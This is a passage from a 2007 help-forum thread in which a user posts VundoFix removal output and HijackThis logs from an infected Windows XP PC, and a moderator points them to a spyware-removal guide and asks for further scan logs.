C:\WINDOWS\system32\mljgeef.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljhhhh.dll
C:\WINDOWS\system32\mljhhhh.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljjhhe.dll
C:\WINDOWS\system32\mljjhhe.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljjhig.dll
C:\WINDOWS\system32\mljjhig.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljjihg.dll
C:\WINDOWS\system32\mljjihg.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljjihh.dll
C:\WINDOWS\system32\mljjihh.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\mljkihi.dll
C:\WINDOWS\system32\mljkihi.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnliif.dll
C:\WINDOWS\system32\nnnliif.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnliij.dll
C:\WINDOWS\system32\nnnliij.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnlkhe.dll
C:\WINDOWS\system32\nnnlkhe.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnmkih.dll
C:\WINDOWS\system32\nnnmkih.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnmljg.dll
C:\WINDOWS\system32\nnnmljg.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnmnml.dll
C:\WINDOWS\system32\nnnmnml.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnnllj.dll
C:\WINDOWS\system32\nnnnllj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnoono.dll
C:\WINDOWS\system32\nnnoono.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnooop.dll
C:\WINDOWS\system32\nnnooop.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\nnnopmn.dll
C:\WINDOWS\system32\nnnopmn.dll Has been deleted!

Attempting to delete C:\WINDOWS\System32\nqstv.bak1
C:\WINDOWS\System32\nqstv.bak1 Has been deleted!

Attempting to delete C:\WINDOWS\System32\nqstv.bak2
C:\WINDOWS\System32\nqstv.bak2 Has been deleted!

Attempting to delete C:\WINDOWS\System32\nqstv.ini
C:\WINDOWS\System32\nqstv.ini Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnkkji.dll
C:\WINDOWS\system32\opnkkji.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnliff.dll
C:\WINDOWS\system32\opnliff.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnliig.dll
C:\WINDOWS\system32\opnliig.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnmjig.dll
C:\WINDOWS\system32\opnmjig.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnmkli.dll
C:\WINDOWS\system32\opnmkli.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnmnmn.dll
C:\WINDOWS\system32\opnmnmn.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\system32\opnollk.dll Could not be deleted.

Attempting to delete C:\WINDOWS\system32\opnoomk.dll
C:\WINDOWS\system32\opnoomk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\opnoopm.dll
C:\WINDOWS\system32\opnoopm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\pmnmnnl.dll
C:\WINDOWS\system32\pmnmnnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomjhfe.dll
C:\WINDOWS\system32\qomjhfe.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomjjkk.dll
C:\WINDOWS\system32\qomjjkk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomkjge.dll
C:\WINDOWS\system32\qomkjge.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomljge.dll
C:\WINDOWS\system32\qomljge.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qommkij.dll
C:\WINDOWS\system32\qommkij.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qommnlm.dll
C:\WINDOWS\system32\qommnlm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomnmnl.dll
C:\WINDOWS\system32\qomnmnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\qomnnoo.dll
C:\WINDOWS\system32\qomnnoo.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqromlm.dll
C:\WINDOWS\system32\rqromlm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqromnk.dll
C:\WINDOWS\system32\rqromnk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqroool.dll
C:\WINDOWS\system32\rqroool.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrpolj.dll
C:\WINDOWS\system32\rqrpolj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrqrpm.dll
C:\WINDOWS\system32\rqrqrpm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\rqrqrss.dll
C:\WINDOWS\system32\rqrqrss.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\sgqdqaux.ini
C:\WINDOWS\system32\sgqdqaux.ini Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnkhi.dll
C:\WINDOWS\system32\ssqnkhi.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnkki.dll
C:\WINDOWS\system32\ssqnkki.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnnmn.dll
C:\WINDOWS\system32\ssqnnmn.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqnolk.dll
C:\WINDOWS\system32\ssqnolk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqolki.dll
C:\WINDOWS\system32\ssqolki.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqomnl.dll
C:\WINDOWS\system32\ssqomnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqonmj.dll
C:\WINDOWS\system32\ssqonmj.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqoopm.dll
C:\WINDOWS\system32\ssqoopm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpmnk.dll
C:\WINDOWS\system32\ssqpmnk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpmnm.dll
C:\WINDOWS\system32\ssqpmnm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpopq.dll
C:\WINDOWS\system32\ssqpopq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqpqqp.dll
C:\WINDOWS\system32\ssqpqqp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqqnkk.dll
C:\WINDOWS\system32\ssqqnkk.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqqool.dll
C:\WINDOWS\system32\ssqqool.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\ssqrrop.dll
C:\WINDOWS\system32\ssqrrop.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvsttr.dll
C:\WINDOWS\system32\tuvsttr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvurqr.dll
C:\WINDOWS\system32\tuvurqr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvuuvw.dll
C:\WINDOWS\system32\tuvuuvw.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvsst.dll
C:\WINDOWS\system32\tuvvsst.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvuvv.dll
C:\WINDOWS\system32\tuvvuvv.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvvvww.dll
C:\WINDOWS\system32\tuvvvww.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvwurp.dll
C:\WINDOWS\system32\tuvwurp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\tuvwxxy.dll
C:\WINDOWS\system32\tuvwxxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqnlji.dll
C:\WINDOWS\system32\urqnlji.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqnllm.dll
C:\WINDOWS\system32\urqnllm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqolii.dll
C:\WINDOWS\system32\urqolii.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqpqnl.dll
C:\WINDOWS\system32\urqpqnl.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqqqoo.dll
C:\WINDOWS\system32\urqqqoo.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\urqrqqn.dll
C:\WINDOWS\system32\urqrqqn.dll Has been deleted!

Attempting to delete C:\WINDOWS\System32\vtsqn.dll
C:\WINDOWS\System32\vtsqn.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vturqrq.dll
C:\WINDOWS\system32\vturqrq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vturrom.dll
C:\WINDOWS\system32\vturrom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusqrr.dll
C:\WINDOWS\system32\vtusqrr.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusrsq.dll
C:\WINDOWS\system32\vtusrsq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtusrss.dll
C:\WINDOWS\system32\vtusrss.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuttqq.dll
C:\WINDOWS\system32\vtuttqq.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuurom.dll
C:\WINDOWS\system32\vtuurom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\vtuuvtt.dll
C:\WINDOWS\system32\vtuuvtt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuroon.dll
C:\WINDOWS\system32\wvuroon.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvussqp.dll
C:\WINDOWS\system32\wvussqp.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvutqom.dll
C:\WINDOWS\system32\wvutqom.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuurpm.dll
C:\WINDOWS\system32\wvuurpm.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\wvuvwxy.dll
C:\WINDOWS\system32\wvuvwxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xuaqdqgs.dll
C:\WINDOWS\system32\xuaqdqgs.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyvuts.dll
C:\WINDOWS\system32\xxyvuts.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywtst.dll
C:\WINDOWS\system32\xxywtst.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywvwu.dll
C:\WINDOWS\system32\xxywvwu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxywwtt.dll
C:\WINDOWS\system32\xxywwtt.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyxxus.dll
C:\WINDOWS\system32\xxyxxus.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\xxyyyxy.dll
C:\WINDOWS\system32\xxyyyxy.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayayab.dll
C:\WINDOWS\system32\yayayab.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayvuur.dll
C:\WINDOWS\system32\yayvuur.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yaywurs.dll
C:\WINDOWS\system32\yaywurs.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yaywuuu.dll
C:\WINDOWS\system32\yaywuuu.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayxwts.dll
C:\WINDOWS\system32\yayxwts.dll Has been deleted!

Attempting to delete C:\WINDOWS\system32\yayyxyy.dll
C:\WINDOWS\system32\yayyxyy.dll Has been deleted!

Attempting to delete C:\WINDOWS\System32\yudpdsvv.dll
C:\WINDOWS\System32\yudpdsvv.dll Has been deleted!

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...

Java version is 1.5.0.8

Scan started at 4:33:02 PM 2/5/2007

Listing files found while scanning....

C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Attempting to delete C:\WINDOWS\system32\opnollk.dll
C:\WINDOWS\system32\opnollk.dll Has been deleted!

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...

Java version is 1.5.0.8

Scan started at 4:45:20 PM 2/5/2007

Listing files found while scanning....

C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Performing Repairs to the registry.
Done!

VundoFix V6.3.5

Checking Java version...

Java version is 1.5.0.8

Scan started at 4:50:23 PM 2/5/2007

Listing files found while scanning....

C:\WINDOWS\System32\yudpdsvv.dll

Beginning removal...

Performing Repairs to the registry.
Done!
------------------------------------------------------------------------


Below is the HIJACKTHIS.LOG after using VundoFix:

Logfile of HijackThis v1.99.1
Scan saved at 4:57:31 PM, on 2/5/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\System32\mysvcc.exe
C:\WINDOWS\system32\srrvc.exe
C:\WINDOWS\System32\svcchost.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\WINDOWS\system32\mfcee.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\Documents and Settings\Sys\4.exe
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - C:\WINDOWS\System32\opnollk.dll (file missing)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - C:\WINDOWS\System32\yudpdsvv.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SWN2] C:\Program Files\Spyware Nuker\swnxt.exe /h
O4 - HKLM\..\Run: [DSLSTATEXE] C:\Program Files\GlobespanVirata\Adsl\dslstat.exe icon
O4 - HKLM\..\Run: [DSLAGENTEXE] C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [mysvcig38] mysvcc.exe
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [msvcc25] svcchost.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] C:\PROGRA~1\eScan\TRAYICOS.EXE /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\RunServices: [mysvcig38] mysvcc.exe
O4 - HKLM\..\RunServices: [msvcc25] svcchost.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\Documents and Settings\Sys\4.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe


Please check and advice my system errors.
Go to the top of the page
 
+Quote Post
rridgely
post Feb 5 2007, 11:02 PM
Post #4


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Alright, now follow this guide:
http://forum.CCleaner.com/index.php?showtopic=6329

In your next reply post the four logs you get from doing those steps. (AVG antispyware, Superantispyware, Bitdefender and a new hijackthis log.)


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 6 2007, 11:40 AM
Post #5


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
THANKS RRIDGELY, I FOLLOWED THE DETAILS, BELOW ARE THE REPORTS.
THESE SPYWARES REMOVED MANY INFECTIONS rolleyes.gif , PLEASE STUDY AND ADVISE THE NEXT STEP.

1) HIJACKTHIS LOG
Logfile of HijackThis v1.99.1
Scan saved at 4:53:54 PM, on 2/6/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Spyware Nuker\swnxt.exe
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\srrvc.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\WINDOWS\system32\mfcee.exe
C:\Documents and Settings\Sys\4.exe
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
C:\WINDOWS\System32\ctfmon.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
